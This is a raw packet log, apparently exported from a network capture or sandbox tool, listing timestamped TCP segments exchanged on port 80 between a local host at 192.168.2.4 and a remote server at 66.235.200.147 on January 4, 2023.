Jan 4, 2023 16:47:38.749805927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749826908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749836922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749849081 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749866962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749890089 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749897003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749916077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749927998 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749946117 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.749959946 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.749982119 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750005960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750297070 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750323057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750355005 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750370026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750370026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750386000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750400066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750418901 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750433922 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750454903 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750469923 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750483990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750507116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750516891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750531912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750547886 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750567913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750579119 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750591040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750611067 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750627995 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750642061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750658989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750677109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750695944 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750730038 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750761986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750771999 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750787020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750809908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750821114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750822067 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750838041 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750853062 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750869989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750883102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750900030 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750925064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750931025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750953913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.750972033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.750986099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751000881 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.751032114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.751282930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751308918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751342058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751358986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.751358986 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.751372099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751385927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.751404047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751420975 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.751441002 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751467943 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751480103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.751480103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.751501083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751529932 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.751533985 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751554012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751571894 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751596928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751627922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751635075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.751668930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751697063 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751676083 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.751729965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751759052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751780987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.751780987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.751780987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.751780987 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.751791954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751816034 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.751825094 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751842022 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.751854897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751873970 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.751887083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751913071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.751916885 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.751940966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.751962900 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752326012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752351999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752377987 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752408028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752440929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752470970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752504110 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752532959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752533913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752533913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752533913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752533913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752533913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752563953 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752594948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752625942 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752659082 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752690077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752688885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752688885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752688885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752688885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752688885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752690077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752718925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752751112 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752777100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752777100 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752778053 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752782106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752814054 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752820015 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752844095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752846003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752867937 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752876997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752895117 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752909899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752928972 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752942085 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752964020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.752974033 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.752993107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753030062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753210068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753259897 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753281116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753292084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753314972 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753325939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753350019 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753359079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753384113 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753396034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753410101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753428936 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753463030 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753463030 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753489017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753493071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753513098 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753525019 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753544092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753556013 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753576040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753588915 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753609896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753619909 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753638983 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753652096 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753669977 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753681898 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753700972 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753712893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753743887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753747940 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753772974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753774881 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753798962 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753808022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753823996 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753842115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753868103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753871918 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753894091 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753905058 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.753918886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.753964901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.754249096 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.754276991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.754309893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.754318953 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.754345894 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.754381895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.754417896 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.754426003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.754426003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.754426003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.754426003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.754470110 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.769382954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769433975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769459009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769478083 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769501925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769527912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769553900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769581079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769613981 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769648075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769648075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.769682884 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769712925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.769712925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.769716024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769733906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.769751072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769771099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.769788027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769803047 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.769821882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769835949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.769846916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769867897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.769871950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769895077 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.769898891 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769917011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.769926071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769943953 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.769952059 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769972086 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.769979000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.769999027 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770004988 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770026922 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770031929 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770050049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770061016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770076036 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770097017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770104885 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770131111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770140886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770165920 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770175934 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770200014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770236969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770236969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770272970 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770281076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770281076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770308018 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770330906 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770339012 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770354033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770365953 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770380020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770391941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770409107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770416975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770432949 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770442963 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770461082 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770468950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770486116 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770495892 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770510912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770522118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770539045 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770548105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770565033 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770574093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770590067 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770603895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770617008 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770637989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770648956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770673037 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770694017 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770734072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770735025 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770771980 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770788908 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770798922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770817995 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770824909 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770844936 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770852089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770873070 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770879030 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770898104 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770926952 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770946026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770952940 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770973921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.770978928 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.770998001 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771007061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771023035 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771032095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771049976 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771060944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771075964 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771119118 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771260977 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771298885 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771333933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771353960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771380901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771380901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771397114 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771435022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771449089 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771472931 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771483898 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771512032 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771517992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771548986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771557093 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771585941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771595001 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771624088 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771631956 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771661997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771672964 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771702051 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771708012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771740913 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771764994 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771768093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771781921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771795034 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771815062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771820068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771843910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771847010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771858931 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771873951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771893024 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:38.771899939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:38.771923065 CET	49696	80	192.168.2.4	66.235.200.147
